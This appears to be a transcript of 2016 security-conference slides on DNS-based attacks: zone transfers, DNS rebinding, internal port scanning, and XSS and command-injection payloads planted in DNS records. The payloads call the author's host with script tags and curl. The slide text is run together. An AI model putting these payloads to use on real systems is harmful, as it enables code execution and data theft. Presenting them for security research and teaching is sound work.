Post on 09-Jan-2017
transcript
2016
DNSand attacks
What is DNS?
The Domain Name System (DNS) is a hierarchical decentralized naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities. Most prominently, it translates more readily memorized domain names to the numerical IP addresses needed for the purpose of locating and identifying computer services and devices with the underlying network protocols. By providing a worldwide, distributed directory service, the Domain Name System is an essential component of the functionality of the Internet.
213.180.204.3 mycomputer.arpa173.194.32.169 dennis.arpa87.240.165.87 newoffice.arpa173.252.89.132 test112210.28.114.254 it.chat.in-addr.arpa
Hosts.txt
A
KEY
DS
AAAA
DNSKEY
CNAME
MXNS PTR
SOA
TSIG
SRV
TXT
DNSand DDoS
dig -t axfr sitename.com
http://half-life.wikia.com/wiki/Half-Life_2_Betahttp://pixelsmashers.com/wordpress/?p=7866
DNSand SOP
What is SOP?
In computing, the same-origin policy is an important concept in the web application security model. Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, hostname, and port number. This policy prevents a malicious script on one page from obtaining access to sensitive data on another web page through that page's Document Object Model.
Same-origin policy
A 97.246.251.93
A 192.168.0.1
evil.xxx:
https://crypto.stanford.edu/dns/dns-rebinding.pdfhttps://www.ptsecurity.com/download/DNS-rebinding.pdf
The resulting attack consists of the following steps: 1. The victim addresses the dns.evil.xxx domain.2. The attacker’s DNS server returns both IP addresses in the fixed order.3. The browser redirects the request to the server at the external 97.246.251.93 IP address.4. The server returns an HTML page containing JavaScript.5. After the browser downloads the page, the client’s JavaScript sends a request to the dns.evil.xxx domain.6. After the request is received, the server script blocks the incoming connections with the victim’s IP address.7. After a while, the client’s script re-addresses the dns.attacker.ru domain. Since the server returns RTS from the 97.246.251.93 IP address, the request is redirected to the local server at 192.168.0.1.
Now the JavaScript is able to send any GET/POST/HEAD requests to an application at 97.246.251.93, as well as process the received responses and send the results to the attacker..
DNSand ports
A 1.2.3.4
A 4.3.2.1
A 192.168.1.1
evil.xxx:
?
test.evil.xxx 192.168.1.1test.evil.xxx report1.hosttest2.evil.xxx 192.168.1.2test2.evil.xxx report2.hosttest3.evil.xxx 192.168.1.3test3.evil.xxx report3.hosttest4.evil.xxx 192.168.1.4test4.evil.xxx report4.host
cat /etc/hosts
?
test.evil.xxx 192.168.1.1test.evil.xxx report1.hosttest2.evil.xxx 192.168.1.2test2.evil.xxx report2.hosttest3.evil.xxx 192.168.1.3test3.evil.xxx report3.hosttest4.evil.xxx 192.168.1.4test4.evil.xxx report4.host
cat /etc/hosts
192.168.1.3:3306 - open port
create page:<img src=”http://test.evil.xxx:3306”>
test.evil.xxx 192.168.1.1test.evil.xxx report1.hosttest2.evil.xxx 192.168.1.2test2.evil.xxx report2.hosttest3.evil.xxx 192.168.1.3test3.evil.xxx report3.hosttest4.evil.xxx 192.168.1.4test4.evil.xxx report4.host
cat /etc/hoststest.evil.xxx (192.168.1.1) errtest.evil.xxx (report1.host) ok, redirect
test2.evil.xxx (192.168.1.2) errtest2.evil.xxx (report2.host) ok, redirect
test3.evil.xxx (192.168.1.2) ok!
test3.evil.xxx report3.host
DNSand DoS
ns.hack.bo0om.ru. 0 IN NSns.hack.bo0om.ru.
DNSand XSS
https://news.ycombinator.com/item?id=8336025http://www.serveradminblog.com/2014/09/xss-via-dns/
Dnschef
[NS] # Queries for mail server records*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?ns></script>
[MX] # Queries for mail server records*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
[CNAME] # Queries for alias records*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
http://thesprawl.org/projects/dnschef/
DNSand RCE
RCE vectors& whoami
`whoami`
$(whoami)
‘&whoami
“&whoami
With $IFS set to default, a blank line displays
Dnschef[NS] # Queries for mail server records*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[MX] # Queries for mail server records*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[CNAME] # Queries for alias records*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&'\"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
DNSand SQLinj
DNSand SQLinj, OOB
DNSand SQLinj, OOB, DNS hijacking, DNS cache poisoning, DNS flood...